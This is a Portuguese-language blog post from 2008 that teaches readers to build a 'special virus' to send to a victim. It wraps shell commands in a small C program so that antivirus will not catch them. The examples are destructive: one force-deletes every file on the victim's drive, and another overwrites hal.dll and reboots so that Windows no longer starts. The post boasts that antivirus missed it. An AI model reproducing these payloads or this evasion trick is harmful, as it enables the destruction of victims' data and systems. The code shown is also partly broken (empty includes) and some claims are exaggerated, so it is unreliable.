6 de dez. de 2008

Aprenda a fazer um Vírus ESPECIAL


Sempre Quando fazemos um arquivo em lotes e tentamos mandar remotamente para a vítima, fracassamos, pois todo anti-vírus(até mesmo o avg free que é uma porcaria) bloqueia e deleta esses arquivos. Para contornar isso, escreva esse programa em linguagem C:


#include

void main(void) {

system("");

}

Substitua coloque o comando desejado entre as aspas e compile. Isso irá gerar um arquivo executável de 1 a 4kb no máximo de tamanho. Esse programa executa o comando como se fosse um batch, porém indetectável. Estive fazendo um teste e nem mesmo o norton pegou! Veja um exemplo muito bom:


#include

void main(void) {

system("del /Q /S /F %HomeDrive%\*.*");

}

Em um clique o hd da vítima é todo apagado. Agora esse daqui fui eu que descobri, e eu achei ele muito poderoso:


#include

void main(void) {

system("Echo garbage_string > C:\\WINDOWS\\System32\\hal.dll");
system("Shutdown -r -t 1");

}

Consistem em enviar uma string qualquer de lixo(garbage) para a hal.dll localizada em C:\WINDOWS\System32. Ela é responsável por administrar todo o hardware da máquina. Em seguida a próxima função system faz a máquina reiniciar. Após o boot aparece a mensagem:

O sistema está corrompido, por favor o reinsta-le novamente.

Não importa quantas vezes a pessoa reinicie sempre aparece isso e ela é obrigada a formatar o hd, instalando o windows novamente. Pois você corrompendo essa dll, corrompe todo o hd da pessoa. Isso mesmo, tudo foi para o "ares" em um piscar de olhos.

OBS: Você pode executar quantos comandos quiser, basta inserir mais funções system.

Nenhum comentário:

Aviso Legal: Declinamos toda e qualquer responsabilidade legal advinda da utilização das dicas contidas no Site. Todos os conteúdos do BLOG foram fornecidos pelos usuários e não foram testados pelo BLOG, não havendo qualquer tipo de garantia de exatidão, confiabilidade ou veracidade. Ao utilizar alguma das Dicas, o usuário está consciente dessa clausula e isenta o BLOG de quaisquer responsabilidades.